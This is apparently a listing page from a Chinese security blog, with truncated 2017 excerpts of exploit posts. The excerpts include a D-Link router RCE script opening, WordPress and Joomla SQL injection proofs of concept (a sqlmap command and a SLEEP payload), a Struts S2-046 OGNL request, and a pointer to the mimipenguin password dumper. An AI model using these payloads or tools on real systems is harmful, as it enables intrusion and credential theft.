• D-Link DIR8xx 远程代码执行漏洞

    D-Link DIR8xx 远程代码执行漏洞
    脚本下载: hnap import requests as rq import struct IP = "192.168.0.1" PORT = "80" # Can differ in different version of routers and versions of firmware # SYSTEM_ADDRESS = 0x1B570 # DIR-890L_REVA_FIRMWARE_PATCH_v1.11B02.BETA01 SYSTEM_ADDRESS = 0x1B50C # DIR-890L_REVA_FIRMWARE_1.10.B07 def _str(address): ...
    作者:unhonker| 发布:2017年9月16日 | 分类:漏洞公布 | 被撸:843次| 标签:
  • Joomla Photo Contest 1.0.2 SQL Injection Vulnerability

    Joomla Photo Contest 1.0.2 SQL Injection Vulnerability
    # # # # # # Exploit Title: Joomla! Component Photo Contest 1.0.2- SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: http://keenitsolution.com/ # Software Link: https://codecanyon.net/item/photo-contest-joomla-extension/13268866 # Demo: http://photo.keenitsolution.com/ # Version: 1.0.2 # Category: Webapps # Tested on: Wi...
    作者:unhonker| 发布:2017年8月29日 | 分类:漏洞公布 | 被撸:779次| 标签:
  • phpBB 3.2.0 Server Side Request Forgery

    phpBB 3.2.0 Server Side Request Forgery
    title: Server Side Request Forgery Vulnerability product: phpBB vulnerable version: 3.2.0 fixed version: 3.2.1 CVE number: impact: Medium homepage: https://www.phpbb.com/ found: 2017-05-21 by: Jasveer Singh (Office Kuala Lumpur) SEC Consult V...
    作者:unhonker| 发布:2017年8月07日 | 分类:漏洞公布 | 被撸:1,117次| 标签:
  • WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection

    WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection
    # Version: 4.2.2 # Tested on: Ubuntu 16.04 1 – Description: Type user access: register user. $_POST[‘CatID’] is not escaped. Ultimate Product Catalogue 4.2.2 Sql Injection 2 – Proof of Concept: 1 – Login as regular user (created using wp-login.php?action=register): 2 – Using: *delete “*” in code* 3 – Timeline: – 22/05...
    作者:unhonker| 发布:2017年6月28日 | 分类:漏洞公布 | 被撸:2,010次| 标签:
  • WordPress Huge-IT Video Gallery 2.0.4 SQL注入

    WordPress Huge-IT Video Gallery 2.0.4 SQL注入
    Advisory ID: DC-2017-01-009 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery Vulnerable Body: cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEE...
    作者:unhonker| 发布:2017年5月30日 | 分类:漏洞公布 | 被撸:1,898次| 标签:
  • WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability

    WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability
    1. Description An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database. The get oarameter ‘kc_ad’ is vulnerable. 2. Proof of concept sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0""...
    作者:unhonker| 发布:2017年4月26日 | 分类:漏洞公布 | 被撸:1,946次| 标签:
  • Linux下密码抓取神器mimipenguin

    Linux下密码抓取神器mimipenguin
    下载地址:https://github.com/huntergregal/mimipenguin 需要root权限。 以下环境测试通过 Kali 4.3.0 (rolling) x64 (gdm3) Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2) VSFTPd 3.0.3-8+b1 (Active FTP client connections...
    作者:unhonker| 发布:2017年4月06日 | 分类:个人关注 | 被撸:1,694次| 标签:
  • S2-046 PoC

    S2-046 PoC
    POST /doUpload.action HTTP/1.1 Host: localhost:8080 Content-Length: 10000000 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z Connection: close ------WebKitFormBoundaryAnmUgTEhFhOZpr9z Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatche...
    作者:unhonker| 发布:2017年3月21日 | 分类:漏洞公布 | 被撸:2,394次| 标签:
  • Fiyo CMS 2.0.6.1 权限提升漏洞

    Fiyo CMS 2.0.6.1 权限提升漏洞
    # Exploit Title: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1 # Google Dork: no # Date: 11-03-2017 # Exploit Author: @rungga_reksya, @dvnrcy # Vendor Homepage: http://www.fiyo.org # Software Link: https://sourceforge.net/projects/fiyo-cms # Version: 2.0.6.1 # Tested on: Windows Server 2012 Datacent...
    作者:unhonker| 发布:2017年3月13日 | 分类:漏洞公布 | 被撸:1,945次| 标签:
  • st2-045测试工具

    st2-045测试工具
    相信有不少运维朋友又要加班加点的打补丁了。 本工具仅用作探测自有资产是否存在该漏洞,请勿用于其他用途,否则后果自负。 测试工具: st2-045ihonker专版 修复意见: 升级st2框架
    作者:unhonker| 发布:2017年3月07日 | 分类:漏洞公布 | 被撸:3,941次| 标签: